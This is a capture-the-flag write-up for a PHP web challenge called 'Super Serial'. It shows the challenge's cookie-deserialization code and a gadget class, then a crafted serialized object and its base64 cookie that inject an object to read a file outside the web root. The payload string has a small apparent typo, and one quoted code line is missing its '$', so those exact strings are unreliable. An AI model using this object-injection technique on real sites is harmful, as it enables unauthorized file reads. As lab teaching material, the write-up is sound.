Super Serial

Info	Details
Category	Web Exploitation
Difficulty	Medium

---

Challenge Overview

This challenge is a mix between fuzzing and knowing about how serialization works in Web Exploitation.

The /index.php site has a simple login form. I tried trying SQLi, checking page source and looking for cookies, but none of these approaches was successful. However, the hint is right in the title "Super Serial" -> Deserialization/serialization.

Everytime you should fuzz the site (my go-to tool is dirsearch) so that s what I did and managed to find some interesting paths:

• cookies.phps

• authentication.php

• index.php

See, that .phps file type catched my eyes. If you try that paths with that extension you'll find what is important for this challenge:

• cookies.phps

• authentication.phps

• index.phps

That is a critical error of showing us the PHP code for each path of the website, so let's analyze them.

Cookie Handling

In cookie.phps path we have this:

if(isset($_COOKIE["login"])){
	try{
		$perm = unserialize(base64_decode(urldecode($_COOKIE["login"])));
		$g = $perm->is_guest();
		$g = $perm->is_admin();
	}
	catch(Error $e){
		die("Deserialization error. ".$perm);
	}
}

?>

And that's the crucial part where we should reverse the all process. Server does urldecode -> b64 decode -> unserialize so we should serialize -> b64 encode -> url encode and put that value in a cookie named 'login' in /authentication.php where it is verified (figured it out in /authentication.phps)

Note: Serialization is the process of turning objects into strings, and in web exploitation it’s dangerous when attackers can control that data and trigger insecure deserialization. This can lead to PHP Object Injection vulnerability (OWASP Top 10 web vulns).

If we catch that error, $perm will be printed.

The access_log Class

Also, we have this class in /authentication.phps

class access_log
{
	public $log_file;

	function __construct($lf) {
		this->log_file = $lf;
	}

	function __toString() {
		return $this->read_log();
	}

	function append_to_log($data) {
		file_put_contents($this->log_file, $data, FILE_APPEND);
	}

	function read_log() {
		return file_get_contents($this->log_file);
	}
}

These are inter-related. We should use this class with its log_file variable in order to have the file read. toString() calls read_log() and toString() is called everytime an object is used as a string.

Payload Construction

So the crafted injection will be:

O:10:"access_log":1:{s:8:"log_file";s:7:"../flag";} (You have to mess arround in order to find the ../flag path, or take a hint from ../users.db located in /index.phps)

Then encoding it to b64 we'll get: TzoxMDOiYWNjZXNzX2xvZyI6MTp7czo4OiJsb2dfZmlsZSI7czo3OiIuLi9mbGFnIjt9 That's the value of that cookie named 'login' that should be stored in /authentication.php path in order to get the flag.

---

made by k0d